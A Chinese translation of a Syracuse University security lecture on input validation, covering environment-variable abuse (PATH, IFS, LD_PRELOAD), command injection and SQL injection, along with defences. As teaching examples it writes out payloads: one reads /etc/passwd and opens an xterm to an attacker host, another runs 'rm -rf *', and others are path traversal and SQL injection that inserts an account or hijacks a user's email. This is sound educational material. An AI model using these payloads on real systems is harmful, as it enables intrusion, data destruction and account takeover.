雪城大学信息安全讲义 六、输入校验

2022-12-01 17:08:16 浏览数 (1)

六、输入校验

原文:Input Validation 译者:飞龙

1 环境变量(隐藏的输入)

环境变量是隐藏的输入。它们存在并影响程序行为。在编程中忽略它们的存在可能导致安全隐患。

PATH

在 Shell 中运行命令时,Shell 会使用 PATH 环境变量搜索所有命令。

下面会发生什么呢?

代码语言:javascript复制
system("mail");

攻击者可以将 PATH 修改成下面,并使当前目录下的mail执行。

代码语言:javascript复制
PATH=".:$PATH"; export PATH

IFS

IFS 变量决定了哪个字符解释为空白字符。它代表了内部字符安分隔符。假设我们将其设置为包含斜杠字符:

代码语言:javascript复制
IFS="/ tn"; export IFS
PATH=".:$PATH"; export PATH

现在从 Bourne shell(例如system或者popen系统调用)中,调用任何使用绝对 PATH 的程序。现在这会解释成下面的东西,尝试在用户的当前目录中执行叫做bin命令。

代码语言:javascript复制
system("/bin/mail root");   --->  system(" bin mail root"); 

IFS 的 Bug 现在在 Shell 中漂亮地禁用了。

LD_LIBRARY_PATH

动态链接目录:在搜索动态库时,UNIX 系统会在由该环境变量提供的特定目录中搜索库。

几乎每个 UNIX 程序都依赖于libc.so,以及每个 Windows 程序都依赖于 DLL。如果这些库变成了木马,许多事情就会发生错误。

攻击者可以改变这个路径,并使程序加载攻击者的库。

代码语言:javascript复制
setenv LD_LIBRARY_PATH /tmp:$LD_LIBRARY_PATH 

或者用户当前目录

代码语言:javascript复制
setenv  LD_LIBRARY_PATH .:$LD_LIBRARY_PATH 

多数现代的 C 运行时库都修复了这个问题,通过当 EUID 不等于 UID,或者 EGID 不等于 GID 时,忽略LD_LIBRARY_PATH变量。

防护应用可以使用可信库静态链接来避免它。

在 Windows 的机制中,加载 DLL 时,通常在搜索系统目录之前,在当前目录中搜索 DLL。如果你点击了 Word 文档来启动 Office,包含文档的目录首先用于搜索 DLL。

LD_PRELOAD

许多 UNIX 系统允许你预加载共享库,通过设置环境变量LD_PRELOAD。这允许你做一些有趣的事情,比如将 C 标准库的函数或者甚至系统调用的 C 接口换成你自己的函数。

如果程序是 Set-UID 程序,现代的系统会忽略LD_PRELOAD

代码语言:javascript复制
% cc -o malloc_interposer.so -G -Kpic malloc_interposer.c 
% setenv LD_PRELOAD $cwd/malloc_interposer.so 

如何去掉环境变量?

代码语言:javascript复制
extern char   **environ;   
int main(int argc, char **argv) {
    environ = 0; 
} 
  • 上面的策略不一定对每个程序都起作用。例如,运行期间加载共享库需要LD_LIBRARY_PATH

案例学习

  • vi漏洞
    • 行为: (1) vi file (2) 保持打开但不保存 (3) vi调用了expreserve,它在保护区域保存缓冲区 (4) expreserve调用mail来向用户发送邮件
    • 事实:
      • expreserve是个 Set-UID 程序,mail使用 Root 权限调用。
      • expreserve使用了system("mail user")或者system("/bin/mail user")
      • expreserve没有注意环境变量。
    • 攻击:
      • 修改了 PATH 和 IFS IFS="/binaltn"使m被调用,而不是/bin/mail

2 进程属性

umask

  • 它决定了新创建文件的默认权限
  • 子进程从它的父进程继承该值
  • 考虑这个场景: 一个 Set-UID 程序在/tmp/tempfile保存临时数据。这个文件的完整性十分重要。如果程序员假设 umask 值为 077,假设可能不成立。攻击者可以从自己的 Shell 中运行这个程序,Set-UID 会从 Shell 继承这个 umask 值。 如何防护它:显式设置 umask 值(使用umask(077)),或者显式设置新创建文件的权限(使用chmod("newfile",0755)

内存转储

如果你的程序保存了敏感数据,例如未加密的密码,你应该禁止程序的内核转储。

如何禁用内和转储?

代码语言:javascript复制
#include <sys/time.h> 


#include <sys/resource.h> 


#include <unistd.h>  


int main(int argc, char **argv) {
    struct rlimit   rlim;
    getrlimit(RLIMIT_CORE, &rlim);
    rlim.rlim_max = rlim.rlim_cur = 0;
    if (setrlimit(RLIMIT_CORE, &rlim)) {
        exit(-1);         
    }
    ...
    return 0;
} 

Solaris 默认(Solaris 8 开始)不允许 Set-UID 程序由于明显的安全原因的内核转储。

3 调用其它程序

安全地调用其它程序

如果 CGI 脚本这样做,会有什么潜在的问题?

代码语言:javascript复制
// $Recipient contains email address provided by the user  
//      using web forms.   
system("/bin/mail", $Recipient); 

$Recipient可能包含 Shell 的特殊字符(| & < >)(命令注入)。

代码语言:javascript复制
"attacker@hotmail.com < /etc/passwd;  
export DISPLAY=proxy.attacker.org:0; /usr/X11R6/bin/xterm&;" 

如果 CGI 脚本这样做,会有什么潜在的问题?

代码语言:javascript复制
system("cat", "/var/stats/$username"); 

攻击者可以将用户名提交为../../etc/passwd(命令注入、路径遍历)。

如果 CGI 脚本这样做,会有什么潜在的问题?

代码语言:javascript复制
sprintf(buf,"telnet %s",url); 
system(buf); 

如果 URL 是这种形式,也会做出回应(命令注入、栈溢出)。

代码语言:javascript复制
host.example.com; rm -rf * 

exec函数、systempopen

  • Exec 函数系列通过将当前进程影响包装成新的,来运行子进程。有许多 Exec 函数的版本,它们工作方式不同。它们可以归类于以下几种:
    • 使用或者不使用 Shell 来启动子进程
    • 通过 Shell(Shell 可以引入比我们预期的更多功能。要注意 Shell 是个强大的程序)处理命令行参数。
  • 启动子进程涉及到依赖和属性继承的问题,我们已经看到它们存在问题。函数execlpexecvp使用 Shell 来启动程序。它们使程序的执行依赖当前用户的 Shell 配置。也就是依赖于 PATH 和其它环境变量的值。execv更安全,因为它并没有向代码引入这种依赖。
  • system(string)调用将字符串传递给 Shell 来作为子进程执行(也就是作为单独派生的进程)。它是 Exec 函数的便利前端。
  • popen的标准实现与之相似。这个函数打开到新进程的管道,以便执行命令,并且读取任何输出作为文件流。这个函数也会启动 Shell,来解释命令行字符串。

如何安全地调用程序?

  • 避免任何调用 Shell 的东西。不要使用system,而是使用execve,它不调用 Shell,与system不同。
  • 避免execlp(file, ...)execvp(file, ...),它们的语义与 Shell 类似。它们使用文件内存作为 Shell 的标准输入,如果文件不是有效的可执行目标文件。
  • 要注意可能使用 Shell 实现的函数。
    • Perl 的open函数能够执行命令,并且通常通过 Shell 来实现。

4 SQL 注入

示例来源于 Steve Fried 的 Unixwiz.net Tech Tips: SQL Injection Attacks by Example。

SQL 注入是个利用 Web 应用的技巧,该应用在查询中使用客户端提供的数据,但是没有首先过滤掉潜在有害的字符。因此,Web 应用可能会执行非预期的 SQL 代码。

一些应用从 Web 表单获取用户输入,之后使用用户输入直接构造 SQL 语句。例如,下面的 SQL 查询使用$EMAIL的值构造,它直接由用户表单提交:

代码语言:javascript复制
SELECT email, passwd, login_id, full_name  
FROM table  
WHERE email = '$EMAIL'; 

上面的应用当用户忘记密码时经常使用。它们只需要键入它们的邮件地址。如果邮件地址在数据库中(用户已注册),该邮件的密码会发到该邮件地址。这个例子中,SQL 注入攻击的目标是能够登入系统,而不需要是它的用户。

猜测字段名称:第一步就是猜测数据库的一些字段名称

下面猜测了字段名称email

如果我们得到了服务器错误,就意味着我们的 SQL 格式错误,并且抛出了语法错误。最可能是由于错误的字段名称。如果我们得到了任何种类的有效回应,我们就正确猜测了名称。这里我们得到了email unknown或者password was sent回复。

代码语言:javascript复制
SELECT fieldlist   
FROM table  
WHERE field = 'x' AND email IS NULL; --'; 

猜测表名称

与之相似,如果消息是email unknown或者password was sent,我们就知道我们的猜测是否正确。

代码语言:javascript复制
SELECT email, passwd, login_id, full_name   
FROM table  
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --'; 

但是,上面只确认了tabname是否是有效名称,不一定是我们使用的名称,下面的语句有所帮助:

代码语言:javascript复制
SELECT email, passwd, login_id, full_name   
FROM members  
WHERE email = 'x' AND members.email IS NULL; --'; 

猜测用户的邮件地址:$EMAIL = x' OR full_name LIKE '%Bob%

如果 SQL 语句执行成功,通常你会看到这样的消息:We sent your password to <…>,其中<…>是邮件地址,它的fill_name%Bob%匹配(%是通配符)。

代码语言:javascript复制
SELECT email, passwd, login_id, full_name   
FROM members  
WHERE email = 'x' OR full_name LIKE '%Bob%'; 

爆破密码(在我们了解有效邮件地址之后)

代码语言:javascript复制
SELECT email, passwd, login_id, full_name   
FROM members  
WHERE email = 'bob@example.com' AND passwd = 'hello123';

如果数据库不是只读的,我们可以尝试下面的东西来添加新用户:

  • 末尾的--(注意空格,或者使用#)是 SQL 注释的开始。这是个有效的方式来去掉最后由应用提供的单引号,并且不会担心它们的匹配。
  • 有一些挑战:
    • Web 表单可能没有像你提供足够的空间来键入整个字符串。
    • Web 应用的用户可能没有members表的INSERT权限。
    • 应用可能不能正常表现,因为我们没有提供其它字段的值。
    • 有效的member可能不仅仅需要members表的一行记录,也需要其它表的关联信息(例如accessrights),所以只向一个表添加可能不足够。
代码语言:javascript复制
SELECT email, passwd, login_id, full_name   
FROM members  WHERE email = 'x';   
INSERT INTO members ('email','passwd','login_id','full_name')    
VALUES ('xyz@hacker.net','hello','xyz','xyz Hacker');--'; 

修改现有用户的邮件地址

  • 如果成功了,攻击者就能访问正常的I lost my password链接,键入更新后的邮件地址,并在邮件中收到 Bob 的密码。
代码语言:javascript复制
SELECT email, passwd, login_id, full_name   
FROM members  WHERE email = 'x';       
UPDATE members       
SET email = 'xyz@hacker.net'       
WHERE email = 'bob@example.com'; 

如何防止 SQL 攻击?

  • 过滤输入
  • 配置错误报告:上面的攻击利用了由服务器返回的错误信息。通过不告诉用户 SQL 查询中实际的错误信息,可以使攻击者更加困难。例如,你可以只说something is wrong
  • 使用预定义参数,所以用户的输入仅仅被看做数据,引号、反斜杠和 SQL 注释记号不会产生影响,因为它们也仅仅被看做数据,并且不会解释为 SQL。看看下面的 Java 代码:
代码语言:javascript复制
// Insecure version 
Statement s = connection.createStatement(); 
ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "   formField);   
// Secure version 
PreparedStatement ps = 
connection.prepareStatement( "SELECT email FROM member WHERE name = ?"); 
ps.setString(1, formField); 
ResultSet rs = ps.executeQuery(); 

0 人点赞